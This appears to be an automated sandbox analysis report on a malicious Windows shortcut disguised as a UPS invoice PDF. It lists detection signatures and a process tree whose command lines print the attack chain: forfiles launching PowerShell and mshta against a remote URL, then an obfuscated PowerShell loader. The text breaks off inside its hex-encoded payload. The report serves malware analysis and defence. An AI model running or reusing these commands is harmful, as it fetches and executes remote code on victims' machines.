Edit tour
Windows
Analysis Report
Invoice-UPS-218931.pdf.lnk.mal.lnk
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- forfiles.exe (PID: 4936 cmdline:
"C:\Window s\System32 \forfiles. exe" /p C: \Windows / m write.ex e /c "powe rshell . m shta https ://nebulaq uestcorpor ation.cc/c dnusa/invo iceupsstag e" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E) - conhost.exe (PID: 4508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6336 cmdline:
. mshta ht tps://nebu laquestcor poration.c c/cdnusa/i nvoiceupss tage MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 4996 cmdline:
"C:\Window s\system32 \mshta.exe " https:// nebulaques tcorporati on.cc/cdnu sa/invoice upsstage MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 4620 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction FwbF g($aDSKbaK ){return - split ($aD SKbaK -rep lace '..', '0x$& ')} ;$JMNVEMgx = FwbFg(' 21A646F03E 7B8D0E0144 FF5C4397D6 E8768C7510 65483745F9 1BB8343AB0 48B2246E85 D2C3339FCB D44E15DFB7 2AFC02B973 4D6A198B8C 26999F960E 241B32E123 B9CBACA3B2 719C137250 6CBCE2AA66 A828088A6F B1394DB34D 592155F830 47EFCC0A4D 824F80F7CF 48D2BEF262 BB9D33AEED 76C583D7D1 50E7BAB97E 9A8CFDF072 921223BBAC 8034DB6994 987DC74DED C903018518 B3F35E6537 D8A19790BD 95F0143B2B 4B7E734D48 A2B7ACD50D 6D344FCF97 F4EE62251F 59AFEEB9CF BEAC068B30 1CDE9B6205 C120F731D9 6BC22D1FC3 1D8EFB7366 A1B397C3FE ACFF206D10 806BD24C4B 7E075E59E4 04FA575B57 9D4A6DF851 FA02F116A2 F66F789FA9 3583B7A924 750A4FCAE2 8D9AC0876F EE6A97B56A 1C444B74CD 5A3658FF27 2917B31D6B FD3C6ECA76 779B6869B4 31C03C8149 6AFFCDED8F CE4236FE3A 29ABA4886B CA3096A535 D941BDB706 E590E88FA7 706D01704C 7206EA1993 D9AEAE980B E847791689 90E621B6CA 14C201182F ADBE2BAD9E 4DAF1390F8 2E6E15665D 552AC5D16E 555E1A10FA 71DB534F23 19ED67A298 283D9D1A17 51E92A4FCF B4D31F6A93 918C158BDD 7EABEF8738 964944F261 4AD2E6956D 5DE3967B3D FE771C9B3D 9AC0461E1D E5472BAB55 BE9C866080 8B51C7080D FEFD889FEB 39F30E08DC D5F153CA0E 79A9BD1E25 A9744BC9BA 6F2D4AD161 933BF97501 242E37612D 84B24A8C78 48DDFBCC7A 2C27BEFFF0 4E49DBBC9B 8747A32D22 D665A58E7B 75BAF2BD3F 1B99490F02 F1CC81FE2E C80A4698AB 32FD2AD22E 0A57EB4582 E03B221A46 AB6F38B547 9E296F8F99 8DD6D5168D DF6BE6B269 68F1BFAC52 8412BB40BF A973A25189 BF34F62AF8 8628E5760F 282273BD9B FF02CDBBA4 D63C85B643 2A4E0D9E27 8E71C030FC 7DEAAD0819 3692A80FB9 45629DE030 29A101207C 5F6CCD2F2A 28646261EE EFE0C2884B 1E19245881 C7F4019F40 A3E6A22A4E 0B908C5823 3F10BB8BD8 761D051FEF C7CA6830D1 69C4CDCFF3 3B2AD16497 7B0CED54F5 45F0020ECB B4EE24B268 29657385A8 DE80F60CBA 5D6B36691D FEC61790CF 77FE52269E D867DFA512 0D6F6B6FB4 4CDFD99729 B57B18279E 84006C9697 187CD589F4 C6670B6731 3C0BC55D33 B4D23D4976 1F9323E4B3 E7611C1E68 CCA7234F6A AAFCDF9910 AF8D82BB84 B2A607C63A 8B87F5F13F 7E8A604B1B A722BD0E87 6B85A74D8B 1827EF22E4 24DBBD1EB3 B2CB9EE6A3 8003CEA4C3 7D16615F53 6B1FFF4B12 9E5612763B 59A74FF64B 2E06055B8B 24F5B5B7EC 633F0335F3 071091D7AD 4106436C23 6007B291CF 7A546785AA 4B12C6C613 2447EBA40F 14CDC19ECB CEE70C975C 7D8F0578F7 FCAE5D8A24 93C63EE193 3513A538C7 932C9E9C55 084260FAE9 10DFE41902 87225BA380 E3F6B46890 5DB1E58629 BB1A1B3C32 96158A9283 0DA5112AF2 F8E2277479 FB9AFE52AB 07C3BA644B DD75957ADB 75241C6C23 F95ACA7AF5 4F336FF6A8 993C9D591E 45CD5E243C 46981298C8 2628286E0C 5E331ACDD5 8AA74DFD31 8E226ABA7F 7800F4A5F0 82919C7022 7FB9FC05B2 1083D3B944 1D09666C4F 983DFB7A8A 821A080FF4 6F4A453A18 A711C5EF4B 13B318F99D